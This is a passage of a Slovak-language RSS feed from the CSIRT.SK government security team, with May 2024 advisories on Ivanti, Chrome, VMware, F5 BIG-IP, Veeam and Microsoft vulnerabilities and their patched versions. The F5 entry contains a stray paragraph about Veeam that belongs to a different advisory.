<p><strong>Výrobca odporúča používať len verzie s&nbsp;platnou technickou podporou a&nbsp;zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie:</strong></p>



<ul>
<li>Ivanti Avalanche na verziu 6.4.3.602</li>



<li>Ivanti Neurons for ITSM (lokálne inštalácie) na verzie 2023.1 Hotfix 2, 2023.2 Hotfix 2, 2023.3 Hotfix 2 alebo 2023.4 Hotfix 2</li>



<li>Ivanti Neurons for ITAM (lokálne inštalácie) na verzie 2023.1 Hotfix 2, 2023.2 Hotfix 2, 2023.3 Hotfix 2 alebo 2023.4 Hotfix 2</li>



<li>Ivanti Connect Secure na verzie 9.1R18.6, 22.7R2 alebo 22.5R2.4</li>



<li>Ivanti Policy Secure na verziu 22.7R1</li>



<li>Ivanti Secure Access na verziu 22.7R1 a vyššie</li>



<li>Ivanti Endpoint Manager na verziu 2022 SU5 so Security Hot patch z&nbsp;mája 2024</li>
</ul>



<p><strong>Zdroje:</strong></p>



<p><a href="https://forums.ivanti.com/s/article/Security-Advisory-May-2024">https://forums.ivanti.com/s/article/Security-Advisory-May-2024</a></p>



<p><a href="https://forums.ivanti.com/s/article/Avalanche-6-4-3-602-additional-security-hardening-and-CVE-fixed">https://forums.ivanti.com/s/article/Avalanche-6-4-3-602-additional-security-hardening-and-CVE-fixed</a></p>



<p><a href="https://forums.ivanti.com/s/article/KB-CVE-2024-22059-and-CVE-2024-22060-for-Ivanti-Neurons-for-ITSM">https://forums.ivanti.com/s/article/KB-CVE-2024-22059-and-CVE-2024-22060-for-Ivanti-Neurons-for-ITSM</a></p>



<p><a href="https://forums.ivanti.com/s/article/KB-Security-Advisory-Ivanti-Connect-Secure-Ivanti-Policy-Secure-May-2024">https://forums.ivanti.com/s/article/KB-Security-Advisory-Ivanti-Connect-Secure-Ivanti-Policy-Secure-May-2024</a></p>



<p><a href="https://forums.ivanti.com/s/article/KB-Security-Advisory-Ivanti-Secure-Access-Client-May-2024">https://forums.ivanti.com/s/article/KB-Security-Advisory-Ivanti-Secure-Access-Client-May-2024</a></p>



<p><a href="https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024">https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1008/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívané zero day zraniteľnosti Google Chrome</title>
		<link>/posts/945</link>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 22 May 2024 07:35:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=945</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie na opravu troch zero-day zraniteľností vo webovom prehliadači Chrome. Zraniteľnosti sú aktívne zneužívané útočníkmi, odporúčame...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie na opravu troch zero-day zraniteľností vo webovom prehliadači Chrome. Zraniteľnosti sú aktívne zneužívané útočníkmi, odporúčame bezodkladnú aktualizáciu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Google Chrome (Windows, Mac) staršie ako 125.0.6422.60/.61, 125.0.6422.60 (Linux)&nbsp; <strong></strong></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-4947</strong></p>



<p><strong>Zero day zraniteľnosť CVE-2024-4947 sa týka </strong><strong>chyby neoverenia typu premennej v&nbsp;komponente V8 a&nbsp;umožňuje útočníkom zápis alebo čítanie pamäte mimo povolené hranice vyrovnávacej pamäte.</strong><strong> Na zraniteľnosť poukázali výskumníci Vasilij Berdnikov a Boris Larin z&nbsp;bezpečnostnej spoločnosti Kaspersky. Úspešné zneužitie zraniteľnosti by mohlo viesť </strong><strong>k&nbsp;vykonávaniu kódu, čo môže napríklad, ohroziť citlivé údaje používateľov</strong><strong>.</strong></p>



<p><strong>CVE-2024-4671</strong></p>



<p><strong>Vysoko závažná zraniteľnosť CVE-2024-4671 umožňuje zneužiť </strong><strong>dealokované miesto pamäte v&nbsp;komponente Visuals a&nbsp;môže viesť k&nbsp;vykonávaniu kódu alebo vyvolať pád aplikácie.</strong><strong></strong></p>



<p><strong>CVE-2024-4761</strong></p>



<p><strong>Zero day zraniteľnosť CVE-2024-4761 je chyba zápisu mimo povolené hodnoty v&nbsp;komponentoch V8 a&nbsp;WebAssembly.</strong><strong> Úspešné zneužitie umožňuje útočníkom vykonávanie kódu alebo vyvolať pád aplikácie.</strong></p>



<p><strong>Zraniteľnosti CVE-2024-4947, CVE-2024-4761 a CVE-2024-4671 sú aktívne zneužívané.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Pád aplikácie</li>



<li>Vykonávanie kódu</li>



<li><strong></strong>Prístup k&nbsp;citlivým informáciám<strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu na najnovšiu možnú verziu prehliadača Google Chrome (minimálne </strong><strong>125.0.6422.60/.61 (Windows, Mac) a 125.0.6422.60 (Linux)).</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html">https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html</a></p>



<p><a href="https://www.zdnet.com/article/google-patches-zero-day-exploit-in-chrome-what-you-need-to-know/#ftag=RSSbaffb68">https://www.zdnet.com/article/google-patches-zero-day-exploit-in-chrome-what-you-need-to-know/#ftag=RSSbaffb68</a></p>



<p><a href="https://www.bleepingcomputer.com/news/google/google-fixes-CVE-2024-4947-third-actively-exploited-chrome-zero-day-in-a-week/">https://www.bleepingcomputer.com/news/google/google-fixes-CVE-2024-4947-third-actively-exploited-chrome-zero-day-in-a-week/</a></p>



<p><a href="https://thehackernews.com/2024/05/chrome-zero-day-alert-update-your.html">https://thehackernews.com/2024/05/chrome-zero-day-alert-update-your.html</a></p>



<p><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_9.html">https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_9.html</a></p>



<p><a href="https://thehackernews.com/2024/05/new-chrome-zero-day-vulnerability-cve.html">https://thehackernews.com/2024/05/new-chrome-zero-day-vulnerability-cve.html</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v produktoch VMware Workstation a Fusion</title>
		<link>/posts/943</link>
					<comments>/posts/943#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 20 May 2024 10:40:46 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Unauthorized access]]></category>
		<guid isPermaLink="false">/?p=943</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v&#160;produktoch VMware Workstation a&#160;Fusion, z&#160;toho je 1 označená ako kritická....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v&nbsp;produktoch VMware Workstation a&nbsp;Fusion, z&nbsp;toho je 1 označená ako kritická. Zraniteľnosti možno zneužiť na vzdialené vykonanie škodlivého kódu, zneprístupnenie služby a&nbsp;neoprávnený prístup k&nbsp;citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>VMware Workstation vo verzii 17.X staršej ako 17.5.2</li>



<li>VMware Fusion vo verzii 13.X staršej ako 13.5.2</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v&nbsp;hypervízoroch VMware Workstation a&nbsp;Fusion. Najzávažnejšia je kritická zraniteľnosť nachádzajúca sa v&nbsp;komponente VBLUETOOTH, ktorá umožňuje vzdialené vykonanie škodlivého kódu.</strong></p>



<p><strong>CVE-2024-22267 </strong>(CVSS skóre 9,3)</p>



<p>Kritická zraniteľnosť s&nbsp;označením CVE-2024-22267 sa nachádza v&nbsp;komponente VBLUETOOTH a&nbsp;umožňuje použiť dealokované miesto v&nbsp;pamäti. Úspešné zneužitie si vyžaduje lokálne administrátorské oprávnenia na virtuálnom počítači a umožňuje vykonávanie kódu na hostiteľskom systéme v rámci procesu VMX.</p>



<p><strong>CVE-2024-22268 </strong>(CVSS skóre 7,1)</p>



<p>CVE-2024-22268 sa nachádza vo funkcionalite SHADER. Lokálny útočník s používateľským prístupom na virtuálnom počítači so zapnutou 3D grafikou by prostredníctvom pretečenia medzipamäte mohol spôsobiť zneprístupnenie služby.</p>



<p><strong>CVE-2024-22269, CVE-2024-22270 </strong>(CVSS skóre 7,1)</p>



<p>Zraniteľnosti v&nbsp;komponente VBLUETOOTH a&nbsp;funkcionalite HGFS (Host Guest File Sharing) umožňujú získanie neoprávneného prístupu k&nbsp;citlivým údajom. Úspešné zneužitie zraniteľností si vyžaduje lokálne administrátorské oprávnenia na virtuálnom počítači a umožňuje prístup k&nbsp;dátam uloženým v&nbsp;pamäti hypervízora.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Administrátorom a&nbsp;používateľom odporúčame bezodkladne aktualizovať zraniteľné systémy, </strong><strong>VMware Workstation aspoň na verziu 17.5.2 a VMware Fusion aspoň na 13.5.2</strong><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280</a></p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p><a id="_msocom_1"></a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/943/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v BIG-IP Next Central Manager</title>
		<link>/posts/941</link>
					<comments>/posts/941#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 May 2024 11:23:35 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=941</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/F5_Networks_logo.svg_-1024x940.png" alt="" /></p>Spoločnosť F5 vydala bezpečnostné aktualizácie na svoj produkt BIG-IP Next Central Manager, ktoré možno zneužiť na vykonanie SQL a OData...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/F5_Networks_logo.svg_-1024x940.png" alt="" /></p>
<p><strong>Spoločnosť F5 vydala bezpečnostné aktualizácie na svoj produkt BIG-IP Next Central Manager, ktoré možno zneužiť na vykonanie SQL a OData injekcie a&nbsp;následné získanie úplnej kontroly nad zraniteľnými systémami.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>BIG-IP Next Central Manager vo verzii 20.X staršej ako 20.2.0</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť nástroja Veeam Service Provider Console. Zneužitie zraniteľnosti umožňuje vzdialené vykonanie škodlivého kódu. Na uvedené zraniteľnosti sú dostupné proof-of-concept kódy demonštrujúce mechanizmus ich zneužitia.</strong></p>



<p><strong>CVE-2024-26026 </strong>(CVSS skóre 8,6)</p>



<p>CVE-2024-26026 spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov a&nbsp;vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu SQL injekcie, získanie citlivých údajov, obídenie autentifikácie a&nbsp;následné získanie úplnej kontroly nad systémom.</p>



<p><strong>CVE-2024-21793 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť s&nbsp;označením CVE-2024-21793 spočíva v&nbsp;nesprávnom spracovávaní OData dopytov, ktoré umožňuje injekciu do parametra „filter“. Zneužitím zraniteľnosti možno získať neoprávnený prístup k&nbsp;citlivým údajom ako sú napr. prihlasovacie údaje administrátorských účtov pre&nbsp;získanie úplnej kontroly nad systémom. Zraniteľnosť je možné zneužiť len v&nbsp;prípade, že je aktivované overovanie prostredníctvom LDAP. Útočník nepotrebuje autentifikáciu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Výrobca odporúča aktualizovať zraniteľné BIG-IP Next Central Manager na verziu 20.2.0 a&nbsp;prostredníctvom sieťových a&nbsp;bezpečnostných prvkov umožňovať prístup k&nbsp;manažmentovým rozhraniam produktov F5 len z&nbsp;dôveryhodných zariadení a sietí.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://my.f5.com/manage/s/article/K000138732">https://my.f5.com/manage/s/article/K000138732</a></p>



<p><a href="https://my.f5.com/manage/s/article/K000138733">https://my.f5.com/manage/s/article/K000138733</a></p>



<p><a href="https://eclypsium.com/blog/big-vulnerabilities-in-next-gen-big-ip/">https://eclypsium.com/blog/big-vulnerabilities-in-next-gen-big-ip/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/941/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť manažmentového nástroja Veeam Service Provider Console</title>
		<link>/posts/938</link>
					<comments>/posts/938#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 May 2024 11:22:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=938</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť nástroja Veeam Service Provider Console, slúžiaceho na centralizovaný manažment prostredí...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť nástroja Veeam Service Provider Console, slúžiaceho na centralizovaný manažment prostredí využívajúcich technologické riešenia od Veeam.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Service Provider Console vo verzii 4.0 (ukončená technická podpora)</li>



<li>Veeam Service Provider Console vo verzii 5.0 (ukončená technická podpora)</li>



<li>Veeam Service Provider Console vo verzii 6.0 (ukončená technická podpora)</li>



<li>Veeam Service Provider Console vo verzii 7.0 staršej ako 7.0.0.18899</li>



<li>Veeam Service Provider Console vo verzii 8.0 staršej ako 8.0.0.19236</li>
</ul>



<p><strong>Opis činnosti:</strong><strong></strong></p>



<p><strong>Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť nástroja Veeam Service Provider Console. Zneužitie zraniteľnosti umožňuje vzdialené vykonanie škodlivého kódu.</strong></p>



<p><strong>CVE-2024-29212</strong> (CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nesprávnej metóde deserializácie využívanej v&nbsp;rámci vzájomnej komunikácie manažmentových agentov a&nbsp;ich komponentov. Vzdialený autentifikovaný útočník s&nbsp;oprávneniami používateľa by ju mohol zneužiť na vykonanie škodlivého kódu na serveroch Veeam Service Provide Console.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Výrobca odporúča používať len verzie s&nbsp;platnou technickou podporou a zasiahnuté systémy aktualizovať na verzie 7.0.0.18899 a 8.0.0.19236.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://www.veeam.com/kb4575">https://www.veeam.com/kb4575</a></p>



<p><a href="https://socradar.io/veeam-service-provider-console-affected-by-severe-rce-vulnerability-cve-2024-29212/">https://socradar.io/veeam-service-provider-console-affected-by-severe-rce-vulnerability-cve-2024-29212/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/938/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci Patch Tuesday opravil aktívne zneužívané zero-day zraniteľnosti</title>
		<link>/posts/907</link>
					<comments>/posts/907#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 16 May 2024 07:14:35 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=907</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v&#160;máji 2024 balík opráv pre portfólio svojich produktov opravujúci 61 zraniteľností, z&#160;ktorých 28 umožňuje vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v&nbsp;máji 2024 balík opráv pre portfólio svojich produktov opravujúci 61 zraniteľností, z&nbsp;ktorých 28 umožňuje vzdialené vykonávanie kódu. Tri zraniteľnosti sú typu zero-day a&nbsp;dve z&nbsp;nich sú aktívne zneužívané.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 7.0</li>



<li>.NET 8.0</li>



<li>Azure Migrate</li>



<li>Dynamics 365 Customer Insights</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Bing Search for iOS</li>



<li>Microsoft Edge (Chromium-based)</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Intune Mobile Application Management for Android</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visual Studio 2017 version 15.9 (includes 15.0 &#8211; 15.8)</li>



<li>Microsoft Visual Studio 2019 version 16.11 (includes 16.0 &#8211; 16.10)</li>



<li>Microsoft Visual Studio 2022 version 17.4</li>



<li>Microsoft Visual Studio 2022 version 17.6</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Microsoft Visual Studio 2022 version 17.9</li>



<li>Office Online Server</li>



<li>PowerBI-client JS SDK</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for ARM64-based Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 version 21H2 for ARM64-based Systems</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong><strong></strong></p>



<p><strong>Spoločnosť Microsoft opravila v&nbsp;rámci svojho pravidelného balíka aktualizácií Patch Tuesday 61 zraniteľností, z&nbsp;toho je 1 kritická a&nbsp;3 zero-day. Najzávažnejšie zraniteľnosti umožňujú vzdialené vykonanie kódu, eskaláciu privilégií, získanie neoprávneného prístupu k&nbsp;citlivým údajom, obídenie bezpečnostných prvkov, či zneprístupnenie služby. Zero-day zraniteľnosti&nbsp;CVE-2024-30040 a CVE-2024-30051 sú aktívne zneužívané.</strong></p>



<p><strong>CVE-2024-30044</strong> (CVSS skóre 8,8)</p>



<p>Kritická zraniteľnosť v&nbsp;produkte Microsoft SharePoint Server umožňuje vzdialenému autentifikovanému útočníkovi s&nbsp;oprávneniami „Site Owner“ vykonať škodlivý kód v&nbsp;kontexte SharePoint servera. Zraniteľnosť je možné zneužiť uploadovaním špeciálne vytvoreného súboru a následným zaslaním špeciálne vytvorenej API požiadavky, ktorá vedie k&nbsp;deserializácii parametrov tohto súboru.</p>



<p><strong>CVE-2024-30040&nbsp;</strong>(CVSS skóre 8,8)</p>



<p>Aktívne zneužívaná zero-day zraniteľnosť operačného systému Windows sa nachádza v komponente MSHTML Platform a jej zneužitie umožňuje obídenie bezpečnostných prvkov pre riadenie COM/OLE a následné vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje interakciu používateľa, ktorý musí stiahnuť špeciálne vytvorený súbor (nemusí ho nevyhnutne otvoriť).</p>



<p><strong>CVE-2024-30051&nbsp;</strong>(CVSS skóre 7,8)</p>



<p>Zero-day zraniteľnosť v&nbsp;knižnici Windows DWM Core Library by lokálny autentifikovaný útočník s&nbsp;oprávneniami štandardného používateľa mohol prostredníctvom zaslania špeciálne vytvorenej požiadavky zneužiť na eskaláciu privilégií (úroveň SYSTEM) a&nbsp;získanie úplnej kontroly nad systémom. Spoločnosť KASPERSKY informovala o&nbsp;phishingových kampaniach, ktoré túto zraniteľnosť aktívne zneužívajú na šírenie malvéru QAKBOT.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Falšovanie identity</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie májového balíka opráv na zraniteľné produkty spoločnosti Microsoft nájdete&nbsp;</strong><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-May">tu</a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2024-patch-tuesday-fixes-3-zero-days-61-flaws/">https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2024-patch-tuesday-fixes-3-zero-days-61-flaws/</a></p>



<p><a href="https://securelist.com/cve-2024-30051/112618/">https://securelist.com/cve-2024-30051/112618/</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30044">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30044</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30040">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30040</a></p>



<p><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/290496">https://exchange.xforce.ibmcloud.com/vulnerabilities/290496</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30051">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30051</a></p>



<p><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/290497">https://exchange.xforce.ibmcloud.com/vulnerabilities/290497</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/907/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – apríl 2024</title>
		<link>/posts/900</link>
					<comments>/posts/900#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 15 May 2024 12:00:48 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=900</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci apríl 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci apríl 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/05/MS2024-04.pdf" data-type="link" data-id="/wp-content/uploads/2024/05/MS2024-04.pdf" target="_blank" rel="noreferrer noopener">Mesačná správa – 04/2024 PDF (993 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a><a href="https://www.csirt.gov.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=16888374950890012865">.</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/900/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností apríl 2024</title>
		<link>/posts/889</link>
					<comments>/posts/889#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 14 May 2024 11:42:32 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=889</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci apríl 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci apríl 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/05/2024_04_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/05/2024_04_mesacnik.pdf" target="_blank" rel="noreferrer noopener">Mesačný prehľad – 04/2024 PDF (264 kB)</a></p>



